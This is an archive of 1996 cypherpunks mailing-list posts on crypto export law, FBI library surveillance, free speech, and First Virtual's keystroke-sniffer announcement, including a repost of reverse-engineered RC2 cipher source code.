tries such-and-such and nothing happens. THAT IS IN FACT WHAT HAPPENED
WITH ZIMMERMANN. 

hence my doing the same thing would be POINTLESS.
the sheep will endlessly fear, no number of counterexamples will
persuade them not to fear, because the fear is not based on *reality*,
but on *hypothetical* situations. even if nothing happens, as it
did with Zimmermann, then the sheep will continue to fear because
of their *imagination*. indeed, that is precisely what continues
on this list.

cpunks are always whining about "sheeple" in this country who have
no guts and hence no glory, but imho cpunks are the biggest batch of
sheep on the planet, all the way up to the head sheep TCM, who writes
long explanations of why the police state is inevitable and nothing
we can do will stop it, and EH, who hides/shouts behind pseudonym(s) on the 
list as an excuse for moderation & leadership.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 30 Jan 1996 02:21:11 +0800
To: cypherpunks@toad.com
Subject: DRE_ams
Message-ID: <199601291753.MAA14813@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   1-29-96. WSJ:

   "MCI, Microsoft Form Partnership to Sell Each Other's
   Products World-Wide."


   1-29-96. FinTim:

   "News and MCI put their money on DBS."

      Includes proposal that Microsoft distribute by MCI
      satellite for pennies rather than for dollars by wire.


   1-29-96. WSJ:

   "Sun to Unveil Prototype of Low-Cost PC for Internet That
   Uses Java Language."

      Java as OS and browser, sidestepping MS and NSCP.


   DRE_ams (for the 3)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 30 Jan 1996 02:41:11 +0800
To: cypherpunks@toad.com
Subject: BAI_bcg
Message-ID: <199601291800.NAA15796@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   1-29-96. FinTim:

   "High street dinosaurs wake up. Online prospects are making
   the banking industry restive."

      Covers a new Bank Administration Institute/Boston
      Consulting Group report, "The Information Highway and
      Retail Banking."


   BAI_bcg

   -----

   An FT reviewer of the KDM/TSU books writes that "Littman
   reveals how little divides the sheriffs of cyberspace from
   its outlaws. Shimomura resembles Mitnick more than he
   would like to admit. The big difference is that the
   computer expert on the right side of the law becomes a
   media celebrity, earns consultancy fees telling companies
   how to defend themselves, and has others pay his expenses
   and buy his equipment. The expert who does not inhabits
   a prison cell with six other men, and is reduced to
   writing pleas for help with a stub pencil."












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 30 Jan 1996 08:19:16 +0800
To: Jean-Francois Avon <jf_avon@citenet.net>
Subject: [NOISE] Re: "German service cuts Net access" (to Santa Cruz)
In-Reply-To: <9601291935.AA19744@cti02.citenet.net>
Message-ID: <Pine.ULT.3.91.960129130750.6235N-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 29 Jan 1996, Jean-Francois Avon wrote:

> olmur@dwarf.bb.bawue.de writes:
>  > Free speech ends where other people can reasonable claim that their
>  > feelings are badly hurt.
> 
> Ask yourself what standard in implied in this sentence...
> 
> Is it 
> "Man as a life-loving rationnal animal"
> or
> "Man as an ever sobbing, unable to cope, emotionnally controlled animal"

There was a lively debate in feminist/legal circles a while back about
introducing "the reasonable woman standard," "the reasonable gay man
standard," etc. into the legal currency. The movement intended to make
"date rape" and sexual harassment easier to prosecute. I didn't keep up
with it, but I'm sure the relevant papers are still being cited. I doubt 
and hope that no court ever took the argument seriously.

My personal rules are:

1. I have the right to get offended however often I want. It's a lot
   healthier than desensitization.

2. I have the right to respond however I want, as long as it's legal and 
   ethical.

3. I do not have the right to tell someone else not to be offended.

4. I do not have the right to control another's actions, much less words
   or thoughts, merely because I find them offensive. 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 30 Jan 1996 03:29:10 +0800
To: Censored Girls Anonymous <carolann@censored.org>
Subject: Re: CP LITE: A Censorship Device?
In-Reply-To: <199601280956.CAA19572@usr2.primenet.com>
Message-ID: <Pine.SUN.3.91.960129132144.11518F-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 28 Jan 1996, Censored Girls Anonymous wrote:

> I've been watching this CP Lite thing develop.

[...]

> There is just no way I will send someone an
> email to a posting they post out of there.

WOW!  Sign me up immediately!

> Love Always,
> 
> Carol Anne
> --

[...]

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed, potestas scientiae in usu est Franklin
might have had to invent him."  in nihilum nil posse reverti
00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjs@netcom.com (cjs)
Date: Tue, 30 Jan 1996 08:30:35 +0800
To: nsb@nsb.fv.com (Nathaniel Borenstein)
Subject: Re: CONTEST:  Name That Program! (no-brainer)
In-Reply-To: <sl3GafqMc50eQWYD0N@nsb.fv.com>
Message-ID: <199601292129.NAA07315@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> As you may have read in my previous message, First Virtual has developed
> and demonstrated a program that completely undermines all known schemes
> for using software-encrypted credit cards on the Internet.  More details
> are avialable at http://www.fv.com/ccdanger.
> 
> That was the easy part.

***ROFL***

This "pre-encryption" program is not a virus. It attaches to the
keyboard driver and captures keystrokes from the keyboard as they are
typed -- BEFORE they can be encrypted by the application encryption
software. First Virtual scientists note that credit a check-digit. A
greater danger is that passwords are also as easily captured.

***ROFL***

This has got to be the no-brainer of the century.

REad teh rest of their press release at:

http://www.fv.com:80/ccdanger/announce.html

You'd think they had discovered the cure for aids or something. =)

Christopher






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 30 Jan 1996 08:41:51 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: Escrowing Viewing and Reading Habits with the Governmen
In-Reply-To: <Pine.SV4.3.91.960129150914.6284C-100000@larry.infi.net>
Message-ID: <Pine.ULT.3.91.960129132704.6235O-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 29 Jan 1996, Alan Horowitz wrote:

> > > Do you really think that the FBI foreign counter-intelligence squad has 
> > > nothing better to do than keep a database of who is reading Che Guevara 
> > > memoirs?
> > 
> > Yes.
> > 
> > Heck, I remember this was a big issue about 15 years ago. Try asking
> > someone who was active in library science in the late 70's, early 80's.
> 
>     I did. They said you're wrong. Shall we start a CP flame-war of
> unattributed allegations from librarians who will recall what *they
> thought* the FBI is interested in?   

I think it was mid-late 80's, actually. I remember reading about it in the
LA Times and Newsweek. I'm sure I could dig up a dozen references in Nexis
if you want. 

The proposal was not to monitor all or political literature, which was
more obviously protected by the First Amendment, but rather technical
literature on certain subjects, such as supercomputers, nuclear physics,
toxicology, and of course (relevance) cryptography. The FBI specifically
wanted to know who was reading Applied Cryptography. 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 30 Jan 1996 10:06:49 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: The Big Lie
In-Reply-To: <v02140a01ad32440a4bf4@[165.254.158.237]>
Message-ID: <199601292138.NAA28478@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


"Robert A. Rosenberg" <hal9001@panix.com> writes:

 > Can you name any other country that was a non-participant in
 > a war, was attacked by one side, and was told by the other
 > side that they could neither join that side nor retaliate
 > for the attacks (I'm talking about Operation Desert Storm
 > and the Scuds aimed at Isreal). Any other country would have
 > been allowed to participate or allowed to declare war on the
 > attacker (and send a few missiles over as an incentive to
 > stop attacking a neutral party to the war).

Other Arab states had mutual defense treaties with Iraq which
would have obligated them to enter the war on the side of Iraq
were there a conflict between Iraq and Israel.  This would have
greatly complicated the Persian Gulf War, and put the United
States in a very difficult position.

The sad part is that Israel required any persuasion or guarantees
at all by the United States to refrain from upsetting the
applecart, especially since the US was doing its best to defend
Israel at the time.

 > The US (and the others Participants) were scared shitless of
 > allowing Isreal into the fight since, if let it, the war
 > would have been over real fast and Sadam H. would have been
 > pushing up daisies

And while the Israelis celebrated and danced in the streets, all
prospects for a lasting negotiated Middle East peace would have
been screwed for the next several centuries.

 > (The Isrealis have a habit of being able to take care of
 > themselves with minimal "collateral damage" when their hands
 > are not tied by the actions of other Governments telling
 > them that they are not allowed to do what any other
 > Government is allowed to do as a matter of normal policy
 > when faced with aggression).

The Israelis take very good care of themselves with the weapons,
military intelligence, and billions in US aid they receive each
year.  Occasional requests by the United States that they
exercise appropriate discretion are hardly out of line.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul E. Campbell" <pecampbe@mtu.edu>
Date: Tue, 30 Jan 1996 03:22:32 +0800
To: cypherpunks@toad.com
Subject: Revisitting Blum-Macali "digital signatures"
Message-ID: <199601291842.NAA27974@metlab1.my.mtu.edu>
MIME-Version: 1.0
Content-Type: text/plain


There was some discussion on Usenet a while back about doing "digital
signatures" with the Blum-Macali public key method.

Briefly, Blum-Macali relies on the BBS generator to generate a "one-time pad".
And the pad can be reversed by taking repeated square roots on the random
number seed (assuming you know the factorization) to get back to the starting
seed.

So, the author suggested that one calculate a digest of the message, call it
D.

Then the author suggested that one calculate D^(1/2), as per the Blum-Micali
method.

Then he goes on to do the signature check by checking whether or not

D^2 == X^4

where X is the "signature".

I understand that there is some sign ambiguity involved in calculating square
roots mod B where B is a Blum integer (that causes 4 possible roots). And
that's the source of ambiguity problems in Rabin digital signatures, but if
the Blum-Micali public key method works, then this sign ambiguity shouldn't
exist (because they define a SPECIFIC root to use), and the method can be
simplified to simply calculating D^(1/2) and the check is simply D==X^2.

What am I missing here?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 30 Jan 1996 10:41:19 +0800
To: Alan Pugh <cypherpunks@toad.com
Subject: Re: "Gentlemen do not read each other's mail"
Message-ID: <m0th1Ur-0008yNC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:15 PM 1/29/96 -0500, Alan Pugh wrote:
>>It isn't clear to me that the Constitution grants "rights" to the government 
>>that aren't already possessed by the people themselves.  Would that even be 
>>possible?   "Powers" maybe, "rights," maybe not.
>
>the constitution is an amazingly consistant document internally. take a slow
>read through it and you will see that you are absolutely correct. when
>'people' are being referred to, the term used is 'rights'. when it is a
>governmental organization (state or federal), the term used is always 'powers'.

Thank you for verifying concurring.  I haven't read the Constitution in a
few years, 
so I was a bit hazy, but I think I managed to hit the nail reasonably well 
on the head.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Tue, 30 Jan 1996 06:46:24 +0800
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <Al3GYGSMc50eQWYAdR@nsb.fv.com>
Message-ID: <Pine.LNX.3.91.960129134655.184C-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

howdy folks,

so what?  fv has a keyboard sniffer...

if you're going to d/l programs from the net and not pay attention to 
what's going on you'll always be at risk and a fool as well.

for what it's worth, this sort of program could easily be used to get 
info more important than credit card numbers.  passphrases and 
passwords of all kinds could be obtained leading to broken accts or 
worthless cryptography.

additionally, this hardly has anything to do with netscape.  this is not 
a 'bug' in netscape.  it's a malicious program.  the only way to prevent 
malicious programs from causing you problems is to know what your 
computer is doing; what it's loading when you boot and what data it sends 
through your phone lines when you're online.

my $0.02...

- -pjf


"Those that give up essential liberty to obtain a little temporary
 safety deserve neither liberty nor safety." -- Benjamin Franklin (1773)

zifi runs LINUX 1.3.59 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp1.6, a Pine/PGP interface.

iQCVAwUBMQ0zik3Qo/lG0AH5AQFGsAQAn7WVyjDVXDSOCZCRa1Df/AlCdyCPrCZu
gpPhJqr1hFvHb83Cv/jSUrHIhCts6+RAl0vccfdHiwLJpkyqu2lLrfS1xNv3w7fU
RWVsEJn8ePC8hRYrk92gYbdWLffZ3g493RSU9h0Suiuzee7neNdrB7bXQwcM9oT4
00GOJC+Wezk=
=D7fF
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 30 Jan 1996 05:50:47 +0800
To: cypherpunks@toad.com
Subject: Re: Escrowing Viewing and Reading Habits with the Governmen
Message-ID: <ad326e8428021004f8f9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:12 PM 1/29/96, Alan Horowitz wrote:
>> > Do you really think that the FBI foreign counter-intelligence squad has
>> > nothing better to do than keep a database of who is reading Che Guevara
>> > memoirs?
>>
>> Yes.
>>
>> Heck, I remember this was a big issue about 15 years ago. Try asking
>> someone who was active in library science in the late 70's, early 80's.
>
>
>    I did. They said you're wrong. Shall we start a CP flame-war of
>unattributed allegations from librarians who will recall what *they
>thought* the FBI is interested in?

I'm not interested in a flame war about librarians and the FBI, but will
tell you what I know: the "Library Awareness Program" was very real. It
reached public awareness in the mid- to late-80s, and was the subject of
numerous news reports.

The various librarian unions blew the whistle on this. As I recall, new
stantards about access to materials by patrons, and privacy expectations,
were issued.

Ah! Once again I thank Alta Vista. A simple search on "Library Awareness
Program" revealed 20 hits on the Web. Here is an excerpt from one of the
hits:

------

WHAT'S NEW, Friday, 3 June 1988 Washington, DC

1. THE NATIONAL SECURITY ARCHIVE FILED SUIT AGAINST THE FBI

yesterday to force the release of documents relevant to the FBI's "Library
Awareness Program" (WN 9 Oct 87). The documents were requested under
the Freedom of Information Act eleven months ago. The FBI at first denied
the existence of the program, and now contends it is confined to the New
York area, but librarians from all over the country report FBI visits.
Meanwhile, the FBI has not provided a single document either to the
National
Security Archive, or to the American Library Association, which filed a
similar FOIA request. People for the American Way is assisting the National
Security Archive in its lawsuit.

2. THE FBI'S "LIBRARY AWARENESS PROGRAM"

is not an effort to raise the literacy of its agents. Even as President
Reagan was lecturing to students at the University of Moscow on the virtues
of a
free society, his new FBI chief, William Sessions, before a Senate
Committee, was defending the FBI's attempts to recruit library employees as
snitches. Sessions released an unclassified version of a top-secret FBI
report that must have been ghost written by Art Buchwald. Entitled "The KGB
and the Library Target: 1962 - Present," it includes examples of suspicious
behavior, such as an individual who "is observed departing the library
after having placed microfiche or various documents in a briefcase without
properly checking them out of the library."
....

---




Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Tue, 30 Jan 1996 11:39:32 +0800
To: cypherpunks@toad.com
Subject: RC2 source code
Message-ID: <199601292158.NAA04160@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Reposted from sci.crypt:

/**********************************************************************\
* To commemorate the 1996 RSA Data Security Conference, the following  *
* code is released into the public domain by its author.  Prost!       *
*                                                                      *
* This cipher uses 16-bit words and little-endian byte ordering.       *
* I wonder which processor it was optimized for?                       *
*                                                                      *
* Thanks to CodeView, SoftIce, and D86 for helping bring this code to  *
* the public.                                                          *
\**********************************************************************/

#include <string.h>
#include <assert.h>

/**********************************************************************\
* Expand a variable-length user key (between 1 and 128 bytes) to a     *
* 64-short working rc2 key, of at most "bits" effective key bits.      *
* The effective key bits parameter looks like an export control hack.  *
* For normal use, it should always be set to 1024.  For convenience,   *
* zero is accepted as an alias for 1024.                               *
\**********************************************************************/

void rc2_keyschedule( unsigned short xkey[64],
                      const unsigned char *key,
                      unsigned len,
                      unsigned bits )
        {
        unsigned char x;
        unsigned i;
        /* 256-entry permutation table, probably derived somehow from pi */
        static const unsigned char permute[256] = {
            217,120,249,196, 25,221,181,237, 40,233,253,121, 74,160,216,157,
            198,126, 55,131, 43,118, 83,142, 98, 76,100,136, 68,139,251,162,
             23,154, 89,245,135,179, 79, 19, 97, 69,109,141,  9,129,125, 50,
            189,143, 64,235,134,183,123, 11,240,149, 33, 34, 92,107, 78,130,
             84,214,101,147,206, 96,178, 28,115, 86,192, 20,167,140,241,220,
             18,117,202, 31, 59,190,228,209, 66, 61,212, 48,163, 60,182, 38,
            111,191, 14,218, 70,105,  7, 87, 39,242, 29,155,188,148, 67,  3,
            248, 17,199,246,144,239, 62,231,  6,195,213, 47,200,102, 30,215,
              8,232,234,222,128, 82,238,247,132,170,114,172, 53, 77,106, 42,
            150, 26,210,113, 90, 21, 73,116, 75,159,208, 94,  4, 24,164,236,
            194,224, 65,110, 15, 81,203,204, 36,145,175, 80,161,244,112, 57,
            153,124, 58,133, 35,184,180,122,252,  2, 54, 91, 37, 85,151, 49,
             45, 93,250,152,227,138,146,174,  5,223, 41, 16,103,108,186,201,
            211,  0,230,207,225,158,168, 44, 99, 22,  1, 63, 88,226,137,169,
             13, 56, 52, 27,171, 51,255,176,187, 72, 12, 95,185,177,205, 46,
            197,243,219, 71,229,165,156,119, 10,166, 32,104,254,127,193,173
        };

        assert(len > 0 && len <= 128);
        assert(bits <= 1024);
        if (!bits)
                bits = 1024;

        memcpy(xkey, key, len);

        /* Phase 1: Expand input key to 128 bytes */
        if (len < 128) {
                i = 0;
                x = ((unsigned char *)xkey)[len-1];
                do {
                        x = permute[(x + ((unsigned char *)xkey)[i++]) & 255];
                        ((unsigned char *)xkey)[len++] = x;
                } while (len < 128);
        }

        /* Phase 2 - reduce effective key size to "bits" */
        len = (bits+7) >> 3;
        i = 128-len;
        x = permute[((unsigned char *)xkey)[i] & (255 >> (7 & -bits))];
        ((unsigned char *)xkey)[i] = x;

        while (i--) {
                x = permute[ x ^ ((unsigned char *)xkey)[i+len] ];
                ((unsigned char *)xkey)[i] = x;
        }

        /* Phase 3 - copy to xkey in little-endian order */
        i = 63;
        do {
                xkey[i] =  ((unsigned char *)xkey)[2*i] +
                          (((unsigned char *)xkey)[2*i+1] << 8);
        } while (i--);
        }

/**********************************************************************\
* Encrypt an 8-byte block of plaintext using the given key.            *
\**********************************************************************/

void rc2_encrypt( const unsigned short xkey[64],
                  const unsigned char *plain,
                  unsigned char *cipher )
        {
        unsigned x76, x54, x32, x10, i;

        x76 = (plain[7] << 8) + plain[6];
        x54 = (plain[5] << 8) + plain[4];
        x32 = (plain[3] << 8) + plain[2];
        x10 = (plain[1] << 8) + plain[0];

        for (i = 0; i < 16; i++) {
                x10 += (x32 & ~x76) + (x54 & x76) + xkey[4*i+0];
                x10 = (x10 << 1) + (x10 >> 15 & 1);
                
                x32 += (x54 & ~x10) + (x76 & x10) + xkey[4*i+1];
                x32 = (x32 << 2) + (x32 >> 14 & 3);

                x54 += (x76 & ~x32) + (x10 & x32) + xkey[4*i+2];
                x54 = (x54 << 3) + (x54 >> 13 & 7);

                x76 += (x10 & ~x54) + (x32 & x54) + xkey[4*i+3];
                x76 = (x76 << 5) + (x76 >> 11 & 31);

                if (i == 4 || i == 10) {
                        x10 += xkey[x76 & 63];
                        x32 += xkey[x10 & 63];
                        x54 += xkey[x32 & 63];
                        x76 += xkey[x54 & 63];
                }
        }

        cipher[0] = (unsigned char)x10;
        cipher[1] = (unsigned char)(x10 >> 8);
        cipher[2] = (unsigned char)x32;
        cipher[3] = (unsigned char)(x32 >> 8);
        cipher[4] = (unsigned char)x54;
        cipher[5] = (unsigned char)(x54 >> 8);
        cipher[6] = (unsigned char)x76;
        cipher[7] = (unsigned char)(x76 >> 8);
        }

/**********************************************************************\
* Decrypt an 8-byte block of ciphertext using the given key.           *
\**********************************************************************/

void rc2_decrypt( const unsigned short xkey[64],
                  unsigned char *plain,
                  const unsigned char *cipher )
        {
        unsigned x76, x54, x32, x10, i;

        x76 = (cipher[7] << 8) + cipher[6];
        x54 = (cipher[5] << 8) + cipher[4];
        x32 = (cipher[3] << 8) + cipher[2];
        x10 = (cipher[1] << 8) + cipher[0];

        i = 15;
        do {
                x76 &= 65535;
                x76 = (x76 << 11) + (x76 >> 5);
                x76 -= (x10 & ~x54) + (x32 & x54) + xkey[4*i+3];

                x54 &= 65535;
                x54 = (x54 << 13) + (x54 >> 3);
                x54 -= (x76 & ~x32) + (x10 & x32) + xkey[4*i+2];
                
                x32 &= 65535;
                x32 = (x32 << 14) + (x32 >> 2);
                x32 -= (x54 & ~x10) + (x76 & x10) + xkey[4*i+1];

                x10 &= 65535;
                x10 = (x10 << 15) + (x10 >> 1);
                x10 -= (x32 & ~x76) + (x54 & x76) + xkey[4*i+0];

                if (i == 5 || i == 11) {
                        x76 -= xkey[x54 & 63];
                        x54 -= xkey[x32 & 63];
                        x32 -= xkey[x10 & 63];
                        x10 -= xkey[x76 & 63];
                }
        } while (i--);

        plain[0] = (unsigned char)x10;
        plain[1] = (unsigned char)(x10 >> 8);
        plain[2] = (unsigned char)x32;
        plain[3] = (unsigned char)(x32 >> 8);
        plain[4] = (unsigned char)x54;
        plain[5] = (unsigned char)(x54 >> 8);
        plain[6] = (unsigned char)x76;
        plain[7] = (unsigned char)(x76 >> 8);
        }





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 30 Jan 1996 09:13:14 +0800
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: CONTEST:  Name That Program!
In-Reply-To: <sl3GafqMc50eQWYD0N@nsb.fv.com>
Message-ID: <Pine.SOL.3.91.960129135251.4013A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



OBKI - Overhyped Boring Keystroke Interceptor?
PROGRAM - Public Relations Optimised Grabber of Really Accessible Material?
MINTATE - Mail Is Not The Answer To Everything?

:-)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Tue, 30 Jan 1996 04:09:54 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: new(?) anti-usenet censorship technique?
Message-ID: <Pine.SUN.3.91.960129140145.10337A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


Playing around online today, it occured to me that much of Compu$pend's 
subscribers (and many other ISPs, especially smaller ones which might be 
subject to governmental pressures) rely largely on people who use chat 
modes frequently, often for sex-related chat... they cannot cut off IRC 
(for example) without hurting their income substantially.

If someone put up an IRC<->news gateway, with a bot that allowed anyone 
on channel to read newsgroups, it'd be virtually impossible to censor; 
one could use a variable channel name to increase the difficulty of 
censoring it.

Has anyone done this before? Or talked about it?
Jon Lasser
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 30 Jan 1996 03:52:38 +0800
To: <roy@sendai.cybrspc.mn.org
Subject: Re: Escrowing Viewing and Reading Habits with the Governmen
Message-ID: <9601291905.AA20307@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Sun, 28 Jan 96 21:05:08
> From:          <alanh@infi.net>
> Subject:       Re: Escrowing Viewing and Reading Habits with the Government
> To:            "roy m. silvernail" <roy@sendai.cybrspc.mn.org>
> Cc:            "timothy c. may" <tcmay@got.net>, cypherpunks@toad.com


> > > The "Library Awareness Program," administered by the Justice Department, is
> > > designed to identify potential criminals before they have a chance to
> > > commit their deeds. The visits to libraries made by the FBI are used to
> > > determine who is reading subversive or dangerous material.
 
> Do you really think the FBI believes that asking librarians to keep 
> records of customer useage is an efficient way to read the customers minds?
> Do you really think that the FBI foreign counter-intelligence squad has 
> nothing better to do than keep a database of who is reading Che Guevara 
> memoirs?

Yes.

Heck, I remember this was a big issue about 15 years ago. Try asking
someone who was active in library science in the late 70's, early 80's.

The general reaction of the library community was, I am glad to say, 
entirely pro-privacy.

Peter Trei
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Pugh <ampugh@mci.newscorp.com>
Date: Tue, 30 Jan 1996 04:10:06 +0800
To: cypherpunks@toad.com
Subject: Re: "Gentlemen do not read each other's mail"
Message-ID: <199601291915.OAA25398@kafka.delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


>It isn't clear to me that the Constitution grants "rights" to the government 
>that aren't already possessed by the people themselves.  Would that even be 
>possible?   "Powers" maybe, "rights," maybe not.

the constitution is an amazingly consistant document internally. take a slow
read through it and you will see that you are absolutely correct. when
'people' are being referred to, the term used is 'rights'. when it is a
governmental organization (state or federal), the term used is always 'powers'.

amp





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Tue, 30 Jan 1996 04:35:12 +0800
To: cypherpunks@toad.com
Subject: Re: Denning's misleading statements
Message-ID: <9601291934.AA19689@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


>At 03:12 PM 1/28/96 -0500, Ben Samman. wrote:
>>There's quite a few folks in the Yale CS department that are pro-Clipper
>>or fence sitters.  They justify it in class by claiming that law
>>enforcement needs these abilities if LE is to remain effective. 

What research grant pays theses guy's salaries?

JFA
Reality IS, Existence Exists.     -John Galt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Tue, 30 Jan 1996 04:50:34 +0800
To: cypherpunks@toad.com
Subject: Re: more RANTING about NSA-friendly cpunks
Message-ID: <9601291935.AA19726@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


"Vladimir Z. Nuri" <vznuri@netcom.com> said:

<much snipped text all over the place>

>my point is that, what is anyone's evidence that what happened to 
>Zimmermann (i.e. NOTHING WHATSOEVER other than an investigation that
>ended with NOTHING) would not happen to whoever tried to "export"
>whatever algorithms they pleased???

>if people are going to pretend that the ITAR crypto sections have
>TEETH, then please
>give a disclaimer that YOU HAVE NO EVIDENCE. I have no problem with
>people getting "paler shades of white" from all their imagined bogeymen.


>Zimmermann SHOWS that any claim that the ITAR has "teeth" APPEARS TO
>BE GROUNDLESS.

>you can argue all you want about HYPOTHETICAL situations, but the
>REALITY is that nobody has ever gotten any nastiness from any
>ITAR-crypto prosecution. 

>if cpunks want excuses to cower in terror of the ITAR (such as e.g.
>TCM seems to advocate), you will find endless  justification from
>your rampant fantasies.

I do not think that wether PZ or anybody else was prosecuted in *this* case means that ITAR does not have teeths.  The most important thing in order to understand a situation is to put yourself in the other guy's shoes.  If I would have been in the govt shoes, maybe I would have let down the case too.  It does not mean that I wouldn't attempt any case like this anymore...  Theses peoples are not stupid.  They might be statists, but they are intelligent statists...

PZ case could have been presented as borderline, and could have made a precedent not in their advantage.

Non-objectivity of a law never prevented the govt to "enforce" it.

JFA
Power tends to corrupt, absolute power corrupts absolutely.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Tue, 30 Jan 1996 23:08:42 +0800
To: cypherpunks@toad.com
Subject: Re: "German service cuts Net access" (to Santa Cruz)
Message-ID: <9601291935.AA19729@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


>olmur@dwarf.bb.bawue.de (Olmur) writes:

>Much as the Third Reich took the view that anti-Nazi speech
>wasn't protected.  Your country hasn't changed its authoritarian
>perspective on freedom of personal expression.  All it has done
>is put a different set of publicly supported items on the
>official censorship list.

>Didn't the Germans learn anything from World War II?

Psycho-epistemology does not change overnight.  It takes *generations*.

Sigh...

JFA
The only survival tool of human race is Reason.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Tue, 30 Jan 1996 04:52:03 +0800
To: cypherpunks@toad.com
Subject: Re: "German service cuts Net access" (to Santa Cruz)
Message-ID: <9601291935.AA19744@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



olmur@dwarf.bb.bawue.de writes:
 > Free speech ends where other people can reasonable claim that their
 > feelings are badly hurt.

Ask yourself what standard in implied in this sentence...

Is it 
"Man as a life-loving rationnal animal"
or
"Man as an ever sobbing, unable to cope, emotionnally controlled animal"
???

JFA
"I always tried to live in order to be able to *fly* another day."  -Gen. Chuck Yeager





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Tue, 30 Jan 1996 09:04:48 +0800
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <Ml3HWaOMc50eEWY6pA@nsb.fv.com>
Message-ID: <Pine.LNX.3.91.960129141757.184E-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 29 Jan 1996, Nathaniel Borenstein wrote:

> Date: Mon, 29 Jan 1996 16:14:14 -0500 (EST)
